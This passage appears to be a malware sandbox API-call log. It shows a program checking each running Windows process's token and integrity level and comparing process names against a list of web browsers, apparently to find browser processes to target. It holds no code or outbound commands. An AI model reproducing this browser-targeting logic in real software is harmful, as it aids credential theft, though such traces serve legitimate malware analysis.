(dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x560) returned 0x584 [0220.678] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x2d6088, dwBuildNumber=0xc800844c, dwPlatformId=0xf0d330, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0220.678] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x58c) returned 1 [0220.678] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0220.678] GetLastError () returned 0x7a [0220.678] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0220.678] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0220.679] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0220.679] CloseHandle (hObject=0x58c) returned 1 [0220.679] CloseHandle (hObject=0x584) returned 1 [0220.679] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0220.679] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0220.680] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0220.680] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0220.680] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0220.680] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0220.680] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x584) returned 0x584 [0220.680] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x58c) returned 1 [0220.680] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0220.680] GetLastError () returned 0x7a [0220.680] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0x1, TokenInformation=0xedc4a0, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xedc4a0, ReturnLength=0xfcfa8c) returned 1 [0220.680] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0220.680] CloseHandle (hObject=0x58c) returned 1 [0220.680] CloseHandle (hObject=0x584) returned 1 [0220.681] GetLengthSid (pSid=0xedc4a8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0220.681] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x584) returned 0x584 [0220.681] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x2d6260, dwBuildNumber=0xc800844c, dwPlatformId=0xf0d330, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0220.681] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x58c) returned 1 [0220.681] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0220.681] GetLastError () returned 0x7a [0220.681] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0220.681] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0220.681] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0220.681] CloseHandle (hObject=0x58c) returned 1 [0220.682] CloseHandle (hObject=0x584) returned 1 [0220.682] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0220.682] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0220.682] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0220.682] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0220.682] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0220.683] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0220.683] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0220.683] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d0) returned 0x0 [0220.683] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6fc) returned 0x584 [0220.683] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x58c) returned 1 [0220.683] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0220.683] GetLastError () returned 0x7a [0220.683] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0x1, TokenInformation=0xedc4a0, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xedc4a0, ReturnLength=0xfcfa8c) returned 1 [0220.683] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0220.683] CloseHandle (hObject=0x58c) returned 1 [0220.683] CloseHandle (hObject=0x584) returned 1 [0220.684] GetLengthSid (pSid=0xedc4a8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0220.684] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6fc) returned 0x584 [0220.684] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x2d68e8, dwBuildNumber=0xc800844c, dwPlatformId=0xf0d330, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0220.684] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x58c) returned 1 [0220.684] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0220.684] GetLastError () returned 0x7a [0220.684] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0220.684] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0220.684] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0220.685] CloseHandle (hObject=0x58c) returned 1 [0220.685] CloseHandle (hObject=0x584) returned 1 [0220.686] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0220.686] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0220.686] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0220.686] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0220.686] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0220.686] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0220.686] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x584 [0220.686] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x58c) returned 1 [0220.686] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0220.686] GetLastError () returned 0x7a [0220.686] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0x1, TokenInformation=0xedc4a0, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xedc4a0, ReturnLength=0xfcfa8c) returned 1 [0220.686] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0220.687] CloseHandle (hObject=0x58c) returned 1 [0220.687] CloseHandle (hObject=0x584) returned 1 [0220.687] GetLengthSid (pSid=0xedc4a8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0220.687] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x584 [0220.687] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x2d6ea0, dwBuildNumber=0xc800844c, dwPlatformId=0xf0d330, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0220.687] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x58c) returned 1 [0220.687] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0220.687] GetLastError () returned 0x7a [0220.687] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0220.687] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0220.688] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0220.688] CloseHandle (hObject=0x58c) returned 1 [0220.688] CloseHandle (hObject=0x584) returned 1 [0220.688] lstrcmpiW (lpString1="firefox.exe", lpString2="undertake.exe") returned -1 [0220.688] lstrcmpiW (lpString1="chrome.exe", lpString2="undertake.exe") returned -1 [0220.689] lstrcmpiW (lpString1="opera.exe", lpString2="undertake.exe") returned -1 [0220.689] lstrcmpiW (lpString1="iexplore.exe", lpString2="undertake.exe") returned -1 [0220.689] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="undertake.exe") returned -1 [0220.689] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="undertake.exe") returned -1 [0220.689] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x584 [0220.689] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x58c) returned 1 [0220.689] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0220.689] GetLastError () returned 0x7a [0220.689] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0x1, TokenInformation=0xedc4a0, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xedc4a0, ReturnLength=0xfcfa8c) returned 1 [0220.689] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0220.689] CloseHandle (hObject=0x58c) returned 1 [0220.689] CloseHandle (hObject=0x584) returned 1 [0220.690] GetLengthSid (pSid=0xedc4a8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0220.690] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x584 [0220.690] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x2d6ff8, dwBuildNumber=0xc800844c, dwPlatformId=0xf0d330, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0220.690] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x58c) returned 1 [0220.690] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0220.690] GetLastError () returned 0x7a [0220.690] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0220.690] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0220.690] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0220.690] CloseHandle (hObject=0x58c) returned 1 [0220.691] CloseHandle (hObject=0x584) returned 1 [0220.691] lstrcmpiW (lpString1="firefox.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0220.691] lstrcmpiW (lpString1="chrome.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0220.691] lstrcmpiW (lpString1="opera.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0220.691] lstrcmpiW (lpString1="iexplore.exe", lpString2="luxury-westminster-editing-cube.exe") returned -1 [0220.691] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0220.692] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="luxury-westminster-editing-cube.exe") returned 1 [0220.692] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x584 [0220.692] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x58c) returned 1 [0220.692] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0220.692] GetLastError () returned 0x7a [0220.692] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0x1, TokenInformation=0xedc4a0, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xedc4a0, ReturnLength=0xfcfa8c) returned 1 [0220.692] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0220.692] CloseHandle (hObject=0x58c) returned 1 [0220.692] CloseHandle (hObject=0x584) returned 1 [0220.692] GetLengthSid (pSid=0xedc4a8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0220.693] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x584 [0220.693] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x2d7150, dwBuildNumber=0xc800844c, dwPlatformId=0xf0d330, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0220.693] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x58c) returned 1 [0220.693] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0220.693] GetLastError () returned 0x7a [0220.693] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0220.693] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0220.693] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0220.693] CloseHandle (hObject=0x58c) returned 1 [0220.693] CloseHandle (hObject=0x584) returned 1 [0220.694] lstrcmpiW (lpString1="firefox.exe", lpString2="devon stickers.exe") returned 1 [0220.694] lstrcmpiW (lpString1="chrome.exe", lpString2="devon stickers.exe") returned -1 [0220.694] lstrcmpiW (lpString1="opera.exe", lpString2="devon stickers.exe") returned 1 [0220.694] lstrcmpiW (lpString1="iexplore.exe", lpString2="devon stickers.exe") returned 1 [0220.694] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="devon stickers.exe") returned 1 [0220.694] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="devon stickers.exe") returned 1 [0220.694] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x584 [0220.694] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x58c) returned 1 [0220.695] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0220.695] GetLastError () returned 0x7a [0220.695] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0x1, TokenInformation=0xedc4a0, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xedc4a0, ReturnLength=0xfcfa8c) returned 1 [0220.695] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0220.695] CloseHandle (hObject=0x58c) returned 1 [0220.695] CloseHandle (hObject=0x584) returned 1 [0220.695] GetLengthSid (pSid=0xedc4a8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0220.695] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x584 [0220.695] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x2d72d0, dwBuildNumber=0xc800844c, dwPlatformId=0xf0d330, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0220.695] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x58c) returned 1 [0220.696] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0220.696] GetLastError () returned 0x7a [0220.696] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0220.696] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0220.696] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0220.696] CloseHandle (hObject=0x58c) returned 1 [0220.696] CloseHandle (hObject=0x584) returned 1 [0220.697] lstrcmpiW (lpString1="firefox.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0220.697] lstrcmpiW (lpString1="chrome.exe", lpString2="eagles_podcast_type_marker.exe") returned -1 [0220.697] lstrcmpiW (lpString1="opera.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0220.697] lstrcmpiW (lpString1="iexplore.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0220.697] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0220.697] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="eagles_podcast_type_marker.exe") returned 1 [0220.697] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f4) returned 0x584 [0220.697] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x58c) returned 1 [0220.697] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0220.697] GetLastError () returned 0x7a [0220.698] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0x1, TokenInformation=0xedc4a0, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xedc4a0, ReturnLength=0xfcfa8c) returned 1 [0220.698] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0220.698] CloseHandle (hObject=0x58c) returned 1 [0220.698] CloseHandle (hObject=0x584) returned 1 [0220.698] GetLengthSid (pSid=0xedc4a8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0220.698] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f4) returned 0x584 [0220.698] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x2d7430, dwBuildNumber=0xc800844c, dwPlatformId=0xf0d330, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0220.698] OpenProcessToken (in: ProcessHandle=0x584, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x58c) returned 1 [0220.698] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0220.698] GetLastError () returned 0x7a [0220.699] GetTokenInformation (in: TokenHandle=0x58c, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0220.699] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0220.699] GetSidSubAuthority 